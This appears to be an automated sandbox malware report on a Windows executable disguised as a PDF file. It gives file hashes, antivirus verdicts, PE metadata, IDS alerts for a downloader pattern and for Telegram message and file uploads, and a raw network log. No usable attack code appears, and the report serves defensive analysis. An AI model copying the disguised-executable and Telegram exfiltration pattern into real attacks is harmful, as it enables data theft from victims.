                                                                                                                                                                              Preview:.m..... .......Y.......X\...;...{......................n.%..........}3......}..h.#..........}3.n.%.........D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ............................................................................................................................................................................................................2...{...................................Z~......}3.........................}3..........................#......n.%.....................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                              Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                              File Type:data
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):16384
                                                                                                                                                                              Entropy (8bit):0.0790369498641779
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:3:cOetYeXsuomm53xo0hHhl/l/uhtollOE/tlnl+/rTc:crzXPOBo0XtlAGpMP
                                                                                                                                                                              MD5:E05CB875D222232DBEAF199F2917D828
                                                                                                                                                                              SHA1:77E0C9C73E312A60DB403BEC208B4E55A968F070
                                                                                                                                                                              SHA-256:7C787AACB8F83A507646D8F443BDEA8E4E960953C828346554BC790A7CF823DF
                                                                                                                                                                              SHA-512:73A50215A29C191C54B3EBE4A77EB744FC325204F7E9BDC5C5E59D9482DEEB89C8B409AF34898975E9E3B54FAA0DB12B018537BA945C2C5430E6D5F523693F3C
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:.e.....................................;...{.......}'......}3..............}.......}3....&.....}..........................}3.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                              File Type:data
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1248
                                                                                                                                                                              Entropy (8bit):5.374943752685652
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:24:3vZ4WSKco4KmBs4RPT6BmFoUebIKomjKcmZ9tXt/NK3R8UHrx:SWSU4y4RQmFoUeWmfmZ9tlNWR8Wt
                                                                                                                                                                              MD5:6D4EE74EAFA8BF21C74F668252755180
                                                                                                                                                                              SHA1:76AF34C15CE14EE2D377E991DE3DB9D9E9C81C9F
                                                                                                                                                                              SHA-256:5391D8915A78448F6111131D8ECA5C22BB03C620A608322B277E52457BB2174A
                                                                                                                                                                              SHA-512:F2FA682EDA0A6E2E17D049B686D52E3E458666E986F1197E6B1007ADD07C348E27E557139B5E360F44149E40680CAED2D5B17850481D6A37FAE080E0D26F382E
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:@...e.................................:..............@..........P................1]...E...........(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.D....................+.H..!...e........System.Configuration.Ins
                                                                                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1043968
                                                                                                                                                                              Entropy (8bit):7.056999631903552
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:24576:rMaSSKy2/SPNichdpPEcw88Cco4H4444C:rRQrc5PEcwi4H4444C
                                                                                                                                                                              MD5:1F74495F02AD58FF437B07CF58A3E0AD
                                                                                                                                                                              SHA1:9EFD59D289256116E9F539FFD7CC319603AC03BA
                                                                                                                                                                              SHA-256:CD7AA2BCA4B3612823B7E73160896E886A3E3DDD495C3AE7F2B47868C5DFF0CF
                                                                                                                                                                              SHA-512:14075253CC9E49A6DC9AF8544F82DB2BB4DFA814390739E6BC5D0D8F6CA74DBF6E989585977F968A1905F4D7C55220C11617886F6DC29A4FCECE97B608FEEECD
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Antivirus:
                                                                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 61%
                                                                                                                                                                              • Antivirus: Virustotal, Detection: 64%, Browse
                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....0................0.............^.... ........@.. .......................@............@.....................................S.......T.................... ....................................................... ............... ..H............text...d.... ...................... ..`.rsrc...T...........................@..@.reloc....... ......................@..B................@.......H........!..`...........D...d@..........................................&.(......*".......*".(.....*Vs....(....t.........*v..}.....(......(....&.(.....*f.r...p.r...p.(2...(3....*..*N.s4...}.....(.....*j.(5.....(6....s....(7....*N.s4...}.....(.....*N.s4...}.....(.....*.(.........*N.s4...}.....(.....*F.~....(X....a...*6.~.....(Y...*F.~....(X....a...*6.~.....(Y...*F.~....(X....a...*6.~.....(Y...*F.~....(X........*J.~..........(Z...*F.~....(X....a...*6.~.....(Y...*F.~....(X......
                                                                                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):26
                                                                                                                                                                              Entropy (8bit):3.95006375643621
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                              MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                              SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                              SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                              SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                              Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):55
                                                                                                                                                                              Entropy (8bit):4.306461250274409
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                                                                                                              MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                                                                                                              SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                                                                                                              SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                                                                                                              SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
                                                                                                                                                                              File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                              Entropy (8bit):7.056999631903552
                                                                                                                                                                              TrID:
                                                                                                                                                                              • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                                                                                                                                                              • Win32 Executable (generic) a (10002005/4) 49.97%
                                                                                                                                                                              • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                                                                                              • DOS Executable Generic (2002/1) 0.01%
                                                                                                                                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                              File name:PDF-3093900299039 pdf.exe
                                                                                                                                                                              File size:1'043'968 bytes
                                                                                                                                                                              MD5:1f74495f02ad58ff437b07cf58a3e0ad
                                                                                                                                                                              SHA1:9efd59d289256116e9f539ffd7cc319603ac03ba
                                                                                                                                                                              SHA256:cd7aa2bca4b3612823b7e73160896e886a3e3ddd495c3ae7f2b47868c5dff0cf
                                                                                                                                                                              SHA512:14075253cc9e49a6dc9af8544f82db2bb4dfa814390739e6bc5d0d8f6ca74dbf6e989585977f968a1905f4d7c55220c11617886f6dc29a4fcece97b608feeecd
                                                                                                                                                                              SSDEEP:24576:rMaSSKy2/SPNichdpPEcw88Cco4H4444C:rRQrc5PEcwi4H4444C
                                                                                                                                                                              TLSH:81256C943B7048B8C536D9F6B9E3827C6A71B86121E2D42635CF2E4C7CC9B8056D31AF
                                                                                                                                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....0................0.............^.... ........@.. .......................@............@................................
                                                                                                                                                                              Icon Hash:98306e8c8cb6828c
                                                                                                                                                                              Entrypoint:0x4ef85e
                                                                                                                                                                              Entrypoint Section:.text
                                                                                                                                                                              Digitally signed:false
                                                                                                                                                                              Imagebase:0x400000
                                                                                                                                                                              Subsystem:windows gui
                                                                                                                                                                              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                                                              Time Stamp:0xF79C3086 [Tue Aug 23 02:46:30 2101 UTC]
                                                                                                                                                                              TLS Callbacks:
                                                                                                                                                                              CLR (.Net) Version:
                                                                                                                                                                              OS Version Major:4
                                                                                                                                                                              OS Version Minor:0
                                                                                                                                                                              File Version Major:4
                                                                                                                                                                              File Version Minor:0
                                                                                                                                                                              Subsystem Version Major:4
                                                                                                                                                                              Subsystem Version Minor:0
                                                                                                                                                                              Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                                                                                                                              Instruction
                                                                                                                                                                              jmp dword ptr [00402000h]
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0xef8080x53.text
                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0xf00000x10e54.rsrc
                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x1020000xc.reloc
                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                              .text0x20000xed8640xeda00fd6dc9ddd038900adafa2980b8848502False0.4634104994082062data7.290668751533855IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                              .rsrc0xf00000x10e540x110003cebdefebc7aa624f266e8325c1df7cdFalse0.05483111213235294data1.5066880831361027IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                              .reloc0x1020000xc0x200996516a8383c88ac14193ffd0b734fcaFalse0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                                                                              NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                              RT_ICON0xf01300x10828Device independent bitmap graphic, 128 x 256 x 32, image size 675840.045353720572577784
                                                                                                                                                                              RT_GROUP_ICON0x1009580x14data1.0
                                                                                                                                                                              RT_VERSION0x10096c0x2fcdata0.43455497382198954
                                                                                                                                                                              RT_MANIFEST0x100c680x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347
                                                                                                                                                                              DLLImport
                                                                                                                                                                              mscoree.dll_CorExeMain
                                                                                                                                                                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                              2025-01-13T12:08:09.909474+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449730132.226.8.16980TCP
                                                                                                                                                                              2025-01-13T12:08:10.940721+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449730132.226.8.16980TCP
                                                                                                                                                                              2025-01-13T12:08:11.496106+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.449735104.21.32.1443TCP
                                                                                                                                                                              2025-01-13T12:08:12.393944+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449736132.226.8.16980TCP
                                                                                                                                                                              2025-01-13T12:08:12.958118+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.449738104.21.32.1443TCP
                                                                                                                                                                              2025-01-13T12:08:21.253202+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449748132.226.8.16980TCP
                                                                                                                                                                              2025-01-13T12:08:22.253242+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449748132.226.8.16980TCP
                                                                                                                                                                              2025-01-13T12:08:22.862735+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.449755104.21.32.1443TCP
                                                                                                                                                                              2025-01-13T12:08:22.885124+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.449756104.21.32.1443TCP
                                                                                                                                                                              2025-01-13T12:08:23.765386+01001810007Joe Security ANOMALY Telegram Send Message1192.168.2.449760149.154.167.220443TCP
                                                                                                                                                                              2025-01-13T12:08:23.846956+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449759132.226.8.16980TCP
                                                                                                                                                                              2025-01-13T12:08:27.383740+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.449767104.21.32.1443TCP
                                                                                                                                                                              2025-01-13T12:08:32.634045+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.449773149.154.167.220443TCP
                                                                                                                                                                              2025-01-13T12:08:34.618729+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.449776104.21.32.1443TCP
                                                                                                                                                                              2025-01-13T12:08:35.524227+01001810007Joe Security ANOMALY Telegram Send Message1192.168.2.449777149.154.167.220443TCP
                                                                                                                                                                              2025-01-13T12:08:43.414538+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.449778149.154.167.220443TCP
                                                                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                              Jan 13, 2025 12:08:07.099356890 CET4973080192.168.2.4132.226.8.169
                                                                                                                                                                              Jan 13, 2025 12:08:07.104254007 CET8049730132.226.8.169192.168.2.4
                                                                                                                                                                              Jan 13, 2025 12:08:07.104336977 CET4973080192.168.2.4132.226.8.169
                                                                                                                                                                              Jan 13, 2025 12:08:07.104523897 CET4973080192.168.2.4132.226.8.169
                                                                                                                                                                              Jan 13, 2025 12:08:07.109365940 CET8049730132.226.8.169192.168.2.4
                                                                                                                                                                              Jan 13, 2025 12:08:08.976592064 CET8049730132.226.8.169192.168.2.4
                                                                                                                                                                              Jan 13, 2025 12:08:09.023787022 CET4973080192.168.2.4132.226.8.169
                                                                                                                                                                              Jan 13, 2025 12:08:09.029398918 CET8049730132.226.8.169192.168.2.4
                                                                                                                                                                              Jan 13, 2025 12:08:09.859023094 CET8049730132.226.8.169192.168.2.4
                                                                                                                                                                              Jan 13, 2025 12:08:09.904186010 CET49734443192.168.2.4104.21.32.1
                                                                                                                                                                              Jan 13, 2025 12:08:09.904283047 CET44349734104.21.32.1192.168.2.4
                                                                                                                                                                              Jan 13, 2025 12:08:09.904371023 CET49734443192.168.2.4104.21.32.1
                                                                                                                                                                              Jan 13, 2025 12:08:09.909473896 CET4973080192.168.2.4132.226.8.169
                                                                                                                                                                              Jan 13, 2025 12:08:09.911415100 CET49734443192.168.2.4104.21.32.1
                                                                                                                                                                              Jan 13, 2025 12:08:09.911454916 CET44349734104.21.32.1192.168.2.4
                                                                                                                                                                              Jan 13, 2025 12:08:10.397248983 CET44349734104.21.32.1192.168.2.4
                                                                                                                                                                              Jan 13, 2025 12:08:10.397358894 CET49734443192.168.2.4104.21.32.1
                                                                                                                                                                              Jan 13, 2025 12:08:10.402823925 CET49734443192.168.2.4104.21.32.1
                                                                                                                                                                              Jan 13, 2025 12:08:10.402868032 CET44349734104.21.32.1192.168.2.4
                                                                                                                                                                              Jan 13, 2025 12:08:10.403337002 CET44349734104.21.32.1192.168.2.4
                                                                                                                                                                              Jan 13, 2025 12:08:10.456341982 CET49734443192.168.2.4104.21.32.1
                                                                                                                                                                              Jan 13, 2025 12:08:10.457562923 CET49734443192.168.2.4104.21.32.1
                                                                                                                                                                              Jan 13, 2025 12:08:10.499360085 CET44349734104.21.32.1192.168.2.4
                                                                                                                                                                              Jan 13, 2025 12:08:10.571261883 CET44349734104.21.32.1192.168.2.4
                                                                                                                                                                              Jan 13, 2025 12:08:10.571470976 CET44349734104.21.32.1192.168.2.4
                                                                                                                                                                              Jan 13, 2025 12:08:10.571543932 CET49734443192.168.2.4104.21.32.1
                                                                                                                                                                              Jan 13, 2025 12:08:10.577229977 CET49734443192.168.2.4104.21.32.1
                                                                                                                                                                              Jan 13, 2025 12:08:10.580598116 CET4973080192.168.2.4132.226.8.169
                                                                                                                                                                              Jan 13, 2025 12:08:10.585494995 CET8049730132.226.8.169192.168.2.4
                                                                                                                                                                              Jan 13, 2025 12:08:10.897963047 CET8049730132.226.8.169192.168.2.4
                                                                                                                                                                              Jan 13, 2025 12:08:10.907630920 CET49735443192.168.2.4104.21.32.1
                                                                                                                                                                              Jan 13, 2025 12:08:10.907660961 CET44349735104.21.32.1192.168.2.4
                                                                                                                                                                              Jan 13, 2025 12:08:10.907728910 CET49735443192.168.2.4104.21.32.1
                                                                                                                                                                              Jan 13, 2025 12:08:10.907983065 CET49735443192.168.2.4104.21.32.1
                                                                                                                                                                              Jan 13, 2025 12:08:10.907994986 CET44349735104.21.32.1192.168.2.4
                                                                                                                                                                              Jan 13, 2025 12:08:10.940721035 CET4973080192.168.2.4132.226.8.169
                                                                                                                                                                              Jan 13, 2025 12:08:11.368647099 CET44349735104.21.32.1192.168.2.4
                                                                                                                                                                              Jan 13, 2025 12:08:11.372059107 CET49735443192.168.2.4104.21.32.1
                                                                                                                                                                              Jan 13, 2025 12:08:11.372102022 CET44349735104.21.32.1192.168.2.4
                                                                                                                                                                              Jan 13, 2025 12:08:11.496090889 CET44349735104.21.32.1192.168.2.4
                                                                                                                                                                              Jan 13, 2025 12:08:11.496225119 CET44349735104.21.32.1192.168.2.4
                                                                                                                                                                              Jan 13, 2025 12:08:11.496283054 CET49735443192.168.2.4104.21.32.1
                                                                                                                                                                              Jan 13, 2025 12:08:11.496674061 CET49735443192.168.2.4104.21.32.1
                                                                                                                                                                              Jan 13, 2025 12:08:11.499994040 CET4973080192.168.2.4132.226.8.169
                                                                                                                                                                              Jan 13, 2025 12:08:11.501205921 CET4973680192.168.2.4132.226.8.169
                                                                                                                                                                              Jan 13, 2025 12:08:11.506786108 CET8049730132.226.8.169192.168.2.4
                                                                                                                                                                              Jan 13, 2025 12:08:11.506901026 CET4973080192.168.2.4132.226.8.169
                                                                                                                                                                              Jan 13, 2025 12:08:11.507822037 CET8049736132.226.8.169192.168.2.4
                                                                                                                                                                              Jan 13, 2025 12:08:11.507967949 CET4973680192.168.2.4132.226.8.169
                                                                                                                                                                              Jan 13, 2025 12:08:11.508167028 CET4973680192.168.2.4132.226.8.169
                                                                                                                                                                              Jan 13, 2025 12:08:11.514678955 CET8049736132.226.8.169192.168.2.4
                                                                                                                                                                              Jan 13, 2025 12:08:12.349210024 CET8049736132.226.8.169192.168.2.4
                                                                                                                                                                              Jan 13, 2025 12:08:12.350579977 CET49738443192.168.2.4104.21.32.1
                                                                                                                                                                              Jan 13, 2025 12:08:12.350662947 CET44349738104.21.32.1192.168.2.4
                                                                                                                                                                              Jan 13, 2025 12:08:12.350735903 CET49738443192.168.2.4104.21.32.1
                                                                                                                                                                              Jan 13, 2025 12:08:12.350986958 CET49738443192.168.2.4104.21.32.1
                                                                                                                                                                              Jan 13, 2025 12:08:12.351022959 CET44349738104.21.32.1192.168.2.4
